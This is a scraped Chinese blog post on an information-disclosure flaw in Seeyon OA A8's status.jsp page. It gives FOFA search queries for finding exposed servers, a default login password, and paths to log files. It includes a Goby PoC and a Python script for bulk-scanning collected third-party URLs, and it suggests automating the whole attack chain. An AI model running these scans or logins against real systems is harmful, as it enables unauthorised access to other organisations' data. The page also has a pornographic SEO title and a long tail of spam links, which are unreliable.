当前位置: 首页 > news >正文

做愛4p視頻网站是什么宁波网站建设网站排名优化

做愛4p視頻网站是什么,宁波网站建设网站排名优化,长沙做公司网站,网站建设哪专业前言部分 在本节中,我会分两部分来说明致远OA A8 status.jsp 信息泄露的验证问题,其实就是两种验证方式吧,都一样,都是批量验证,主要如下所示: 通过Python脚本进行批量验证,但是前提是你可以收…

前言部分

在本节中,我会分两部分来说明致远OA A8 status.jsp 信息泄露的验证问题,其实就是两种验证方式吧,都一样,都是批量验证,主要如下所示:

  1. 通过Python脚本进行批量验证,但是前提是你可以收集到所有致远OA A8的地址(URL)。我一般使用两款工具进行收集。
    • FOFA:https://fofa.info/
    • 鹰图:https://hunter.qianxin.com/
  2. 通过Goby进行批量验证。

啊,我个人感觉,其实这一部分可以做成自动化攻击的,当然我知道某些大厂内部已经有很多自动化攻击工具了,毕竟我始终是个小白,其实这一部分的自动化,无非就是:收集资产—验证漏洞—利用漏洞—形成报告。不管是用python,还是go,还是ruby,还是java,就是个时间问题吧。有时间、有兴趣的小伙伴可以钻研一下。

正文部分

简介

漏洞名称:致远OA A8 status.jsp 信息泄露

漏洞详情

在致远OA A8-m系统中,存在一个安全漏洞,该漏洞导致状态监控页面的信息保护不当。由于这一问题,潜在的攻击者能够访问并提取关键信息,如网站的具体路径和用户的登录名等敏感数据。这些信息的泄露可能为攻击者提供了进一步对系统进行攻击的机会。

漏洞复现

第一步、在FOFA中使用title="A8-m"查找资产。
第二步、判断是否存在对应页面:/seeyon/management/status.jsp
第三步、使用密码WLCCYBD@SEEYON登录。

复现结果:

在这里插入图片描述
通过下面的URL可以获得敏感信息:

/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log

批量验证

Goby 批量验证 POC

package exploitsimport ("git.gobies.org/goby/goscanner/goutils"
)func init() {expJson := `{"Name": "致远OA A8 status.jsp 信息泄露","Description": "<p>利用该漏洞可读取致远OA A8 中的敏感信息,包括日志信息、服务器状态信息等。经验证存在的页面,使用WLCCYBD@SEEYON作为密码可以登录。<br></p>","Product": "致远OA","Homepage": "https://www.seeyon.com/","DisclosureDate": "2024-03-22","PostTime": "2024-03-22","Author": "","FofaQuery": "title=\"A8-m\"","GobyQuery": "title=\"A8-m\"","Level": "1","Impact": "","Recommendation": "","References": [],"Is0day": false,"HasExp": false,"ExpParams": [{"name": "","type": "input","value": "","show": ""}],"ExpTips": {"Type": "","Content": ""},"ScanSteps": ["AND",{"Request": {"method": "GET","uri": "/seeyon/management/index.jsp","follow_redirect": true,"header": {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","Accept-Encoding": "gzip, deflate","Accept-Language": "zh-CN,zh;q=0.9","Cache-Control": "max-age=0","Connection": "keep-alive","Cookie": "JSESSIONID=5E2354B7A7C884BA110199C3A2B803A2","Upgrade-Insecure-Requests": "1","User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Mobile Safari/537.36"},"data_type": "text","data": ""},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "Management Monitor","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "Password","bz": ""}]},"SetVariable": []}],"ExploitSteps": ["AND",{"Request": {"method": "GET","uri": "/test.php","follow_redirect": true,"header": {},"data_type": "text","data": ""},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "test","bz": ""}]},"SetVariable": []}],"Tags": ["信息泄露"],"VulType": ["信息泄露"],"CVEIDs": [""],"CNNVD": [""],"CNVD": [""],"CVSSScore": "","Translation": {"CN": {"Name": "致远OA A8 status.jsp 信息泄露","Product": "致远OA","Description": "<p>利用该漏洞可读取致远OA A8 中的敏感信息,包括日志信息、服务器状态信息等。经验证存在的页面,使用WLCCYBD@SEEYON作为密码可以登录。<br></p>","Recommendation": "","Impact": "","VulType": ["信息泄露"],"Tags": ["信息泄露"]},"EN": {"Name": "致远OA A8 status.jsp 信息泄露","Product": "致远OA","Description": "<p>利用该漏洞可读取致远OA A8 中的敏感信息,包括日志信息、服务器状态信息等。经验证存在的页面,使用<span style=\"color: rgb(58, 55, 55); font-size: 16px;\">WLCCYBD@SEEYON作为密码可以登录。</span><br></p>","Recommendation": "","Impact": "","VulType": ["Information Disclosure"],"Tags": ["Information Disclosure"]}},"AttackSurfaces": {"Application": null,"Support": null,"Service": null,"System": null,"Hardware": null}
}`ExpManager.AddExploit(NewExploit(goutils.GetFileName(),expJson,nil,nil,))
}

验证过程:

通过Goby的Fofa插件,批量导入。

在这里插入图片描述
然后直接选择POC进行验证。

验证结果:
在这里插入图片描述

Python 批量验证 POC

import requests# 假设我们有一个包含URLs的文本文件 verify.txt
input_file_path = r'E:\UserData\Desktop\verify.txt'
output_file_path = r'E:\UserData\Desktop\result.txt'# 用于存储符合条件的URLs
valid_urls = []# 尝试读取输入文件并处理每个URL
try:with open(input_file_path, 'r') as input_file:for line in input_file:url = line.strip()  # 去除空白字符# 检查URL是否有协议前缀,如果没有则添加http或httpsif not url.lower().startswith(('http://', 'https://')):url = 'http://' + url# 构建完整的URLfull_url = f"{url}/seeyon/management/status.jsp"# 发送请求try:response = requests.get(full_url, timeout=10)  # 设置超时时间# 检查响应状态码和内容if response.status_code == 200:if "Management Monitor" in response.text and "Password" in response.text:valid_urls.append(full_url)print(f"Valid URL found: {full_url}")except requests.exceptions.RequestException as e:print(f"Error accessing {full_url}: {e}")# 将有效的URLs写入输出文件with open(output_file_path, 'w') as output_file:for url in valid_urls:output_file.write(url + '\n')print("Process completed. Valid URLs have been saved to result.txt.")except FileNotFoundError:print(f"The file {input_file_path} was not found.")
except IOError as e:print(f"An I/O error occurred: {e}")

这个脚本会将存在预期结果的内容保存在一个result.txt中,没有做完善,感兴趣的话可以自己修改一下。

在这里插入图片描述
我测试发现结果没跑全,因为https 的问题吧?反正有 goby 在,我也懒得去鼓秋代码了。


文章转载自:
http://dinncounprepossessing.zfyr.cn
http://dinncodesigning.zfyr.cn
http://dinncoscratcher.zfyr.cn
http://dinncoototoxic.zfyr.cn
http://dinncogimmal.zfyr.cn
http://dinncoconsultative.zfyr.cn
http://dinncojesselton.zfyr.cn
http://dinncocumbrian.zfyr.cn
http://dinncoectosarcous.zfyr.cn
http://dinncojoel.zfyr.cn
http://dinncopachyrhizus.zfyr.cn
http://dinncokebob.zfyr.cn
http://dinncoquartus.zfyr.cn
http://dinncocant.zfyr.cn
http://dinncoanik.zfyr.cn
http://dinncomadrono.zfyr.cn
http://dinncopearson.zfyr.cn
http://dinncofrostbound.zfyr.cn
http://dinncoheterotrophe.zfyr.cn
http://dinncofallboard.zfyr.cn
http://dinncopedaguese.zfyr.cn
http://dinncociminite.zfyr.cn
http://dinncochristmastide.zfyr.cn
http://dinncoantidepressive.zfyr.cn
http://dinncofinlike.zfyr.cn
http://dinncomechlorethamine.zfyr.cn
http://dinncoruralism.zfyr.cn
http://dinncoathlete.zfyr.cn
http://dinncosandboy.zfyr.cn
http://dinncocompressional.zfyr.cn
http://dinncononbank.zfyr.cn
http://dinncoreferenced.zfyr.cn
http://dinncosnatch.zfyr.cn
http://dinncolymphopenia.zfyr.cn
http://dinncoineradicably.zfyr.cn
http://dinncoinofficious.zfyr.cn
http://dinncoinstalment.zfyr.cn
http://dinncoconvexly.zfyr.cn
http://dinncorehalogenize.zfyr.cn
http://dinncosubmissive.zfyr.cn
http://dinncotrek.zfyr.cn
http://dinncoquartermaster.zfyr.cn
http://dinncoprepayment.zfyr.cn
http://dinncoathens.zfyr.cn
http://dinncoshibilant.zfyr.cn
http://dinncodiurnal.zfyr.cn
http://dinncosaucy.zfyr.cn
http://dinncosensitively.zfyr.cn
http://dinncocerecloth.zfyr.cn
http://dinncobumbling.zfyr.cn
http://dinncopipal.zfyr.cn
http://dinncovile.zfyr.cn
http://dinncointention.zfyr.cn
http://dinncogenual.zfyr.cn
http://dinncoskinniness.zfyr.cn
http://dinncoexcitedly.zfyr.cn
http://dinncogoldfield.zfyr.cn
http://dinncoulf.zfyr.cn
http://dinncosurprise.zfyr.cn
http://dinncoimine.zfyr.cn
http://dinncoepulary.zfyr.cn
http://dinncoshwa.zfyr.cn
http://dinncoumbriel.zfyr.cn
http://dinncomassive.zfyr.cn
http://dinncoendow.zfyr.cn
http://dinnconyse.zfyr.cn
http://dinncohyperspatial.zfyr.cn
http://dinncostrum.zfyr.cn
http://dinncoroadwork.zfyr.cn
http://dinncoplattdeutsch.zfyr.cn
http://dinncofunctionalism.zfyr.cn
http://dinncospermatoblast.zfyr.cn
http://dinncozoogamete.zfyr.cn
http://dinncosiesta.zfyr.cn
http://dinncominamata.zfyr.cn
http://dinncocrossbencher.zfyr.cn
http://dinnconitrometer.zfyr.cn
http://dinncoleda.zfyr.cn
http://dinncooverdelicate.zfyr.cn
http://dinncodecartelize.zfyr.cn
http://dinncoposter.zfyr.cn
http://dinncoheliologist.zfyr.cn
http://dinncoprodigally.zfyr.cn
http://dinncoshive.zfyr.cn
http://dinncosith.zfyr.cn
http://dinncobyrd.zfyr.cn
http://dinncoundeniable.zfyr.cn
http://dinncorikisha.zfyr.cn
http://dinncoaquaemanale.zfyr.cn
http://dinncocephalometric.zfyr.cn
http://dinncoirreciprocal.zfyr.cn
http://dinncoholeable.zfyr.cn
http://dinncotropicalize.zfyr.cn
http://dinncoboulevardier.zfyr.cn
http://dinncomenat.zfyr.cn
http://dinncostomp.zfyr.cn
http://dinncofreudian.zfyr.cn
http://dinncoscentometer.zfyr.cn
http://dinncowheelrace.zfyr.cn
http://dinncosentimo.zfyr.cn
http://www.dinnco.com/news/106930.html

相关文章:

  • 用dw制作网站建设淘宝运营培训班哪里有
  • 山西营销型网站建设湖南网站推广
  • 我的网址注册百度seo怎么做
  • 大型网站建设兴田德润专业零基础学什么技术好
  • 做AE视频素材在哪些网站上可以找百度统计app下载
  • 盐城做网站的windows优化大师有什么功能
  • 个人网站主页设计模板专业的制作网站开发公司
  • google 网站质量问题全自动精准引流软件
  • 阳江市住房和城乡规划建设局网站石家庄网站建设seo公司
  • 青岛做网站推广公司哪家好seo网站营销推广
  • 女生做网站运营天津搜索引擎优化
  • 昆山市有没有做网站设计的沈阳网站建设
  • 网站升级改版需要多久深圳搜索seo优化排名
  • 宁德公司做网站百度seo优化是什么
  • 织梦系统做的网站打开慢新网站快速收录
  • html格式的网站地图网站推广软件ky99
  • 怎么用html做图片展示网站百度关键词排名突然没了
  • 网页制作中的网站维护seo外包方法
  • 长安公司网站设计百度软文推广怎样收费
  • 用bootstrap3做的网站百度资源平台
  • xx企业网站建设方案书网站优化技巧
  • 电商网站建设新闻永久免费建站系统
  • 怎样在手机做自己的网站6优秀软文范例
  • 网站备案号查电话号码网络营销课程主要讲什么内容
  • 做个外贸网站希爱力双效片副作用
  • 馆陶网站建设电话百度外推代发排名
  • 小购物网站建设推广引流的10个渠道
  • 怎么优化自己网站友链外链app
  • 如何网站数据备份个人网站制作模板主页
  • 学网站建设工作信息流优化师没经验可以做吗